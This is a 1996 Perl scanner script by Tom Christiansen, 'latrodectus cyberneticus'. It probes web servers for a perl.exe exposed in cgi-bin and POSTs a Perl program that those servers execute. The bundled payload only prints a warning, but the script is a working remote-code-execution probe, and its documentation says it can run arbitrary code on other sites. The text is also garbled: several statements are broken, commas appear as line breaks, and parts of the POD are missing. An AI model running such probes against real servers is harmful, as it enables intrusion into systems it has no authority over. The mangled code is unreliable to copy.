#!/usr/bin/perl -w
#
##############################################################################
# latrodectus cyberneticus - probe web for insecure perl installations
# tchrist@perl.com
# version 1.0 Thu Mar 28 17:53:42 MST 1996
#
# requires the LWP library fetchable from the CPAN multiplexor at
#    http://www.perl.com/cgi-bin/cpan_mod?module=LWP
##############################################################################

require 5.002;
use strict;
use LWP::UserAgent;

=head1 NAME

latrodectus cyberneticus - probe web for insecure perl installations

=head1 SYNOPSIS

Via command line arguments:

latro host1 //host2/bincgi //host3/bincgi/badperl

or via STDIN:

sed 's/ .*//' access_log | sort -u | latro

=head1 DESCRIPTION

B is designed to probe whether your site or sites you control have
been compromised by the insanely idiotic practice of placing a perl
executable in the cgi-bin.  If you have ever seen anyone post a URL like

http://dummy.org/cgi-bin/perl.exe?FMH.pl

then you know they have the problem.  This is pathetically
pervasive amongst (horrifically mismanaged) sub-Unix web sites.

=head1 USE AND MISUSE

Robert Heinlein once wrote: "Stupidity cannot be cured with money
or
through education
or by legislation.  Stupidity is not a sin
the victim
can't help being stupid.  But stupidity is the only universal capital
crime; the sentence is death
there is no appeal
and execution is carried
out automatically and without pity."

Consider this program such execution -- or at least the threat thereof.

You can do very evil things with this program.  Very evil things.  You can
execute I on their site.  Please don't do anything
(too) wicked.  When you find such sites
please do the responsible and professional
thing and mail their cluefully challenged webmaster about the problem.

My goal with this program is to shake up the web a little bit now lest a
I poison spider should someday rip it to shreds and blame perl.  It's not
perl's fault.  It's the idiocy of the PC web sites -- and the vendors and
docs that tell them to do this ineffably idiotic and evil thing.

=head1 AUTHOR

Tom Christiansen

Last update:
Thu Mar 28 17:53:42 MST 1996

=cut

my $PROGNAME = "latrodectus cyberneticus";
my $VERSION = "1.0";

my $DEF_CGI_BIN   = "/cgi-bin";

# should prolly both "perl" and "perl.com" as well as
# the "perl.exe" thing.
my $DEF_PERL_PATH = "/perl.exe";
my $PROGRAM = join qq===>;

$| = 1;

#use LWP::Debug qw(level);
#level('+');

if (@ARGV) {
for (@ARGV) { probe($_) }
} elsif (!-t STDIN) {
while () {
chomp;
probe($_);
}
} else {
die "usage: $0 [site ...]\n";
}

sub probe {
my $site = shift;

my $cgi_bin = '';
my $perl_path = '';
my $pre_site = '';

if ($site !~ m#/#) {
$cgi_bin = $DEF_CGI_BIN;
}
if ($site !~ /perl/) {
$perl_path = $DEF_PERL_PATH;
}
if ($site !~ m#^//#) {
$pre_site = '//';
}

my $ua  = LWP::UserAgent->new();
$ua->agent("$PROGNAME
v$VERSION");

my $full_targ = 'http:' . $pre_site . $site . $cgi_bin . $perl_path;

printf "%-35s "
$site;

my $req = HTTP::Request->new( POST => $full_targ );

$req->content_type('application/x-www-form-urlencoded');
$req->content($PROGRAM);
my $res = $ua->request($req);

# check the outcome
if ($res->is_success) {
if ($res->content =~ /WWW Black Widow/) {
print ">>\n";
} else {
my $oops = $res->content;
$oops =~ s/\n/ /g;
print "APPREHENDED: $oops\n";
}
} else {
my $oops = $res->code .  " " .  $res->message;
if ($res->code == 404) {
print "SAFE:  $oops";
} else {
print "ERROR: $oops";
}
print "\n" unless $oops =~ /\n$/;
}

}

__END__

# Here begins the remote program.  Whatsoever you place
# within this code shall be executed on the foreign system

# without checks
 without pity and without remorse.
#
# Play nicely.

print ;

print "If I were nasty
you'd be spiderfood by now.\n";

print "\n\n\t--the black widow\n";

__END__
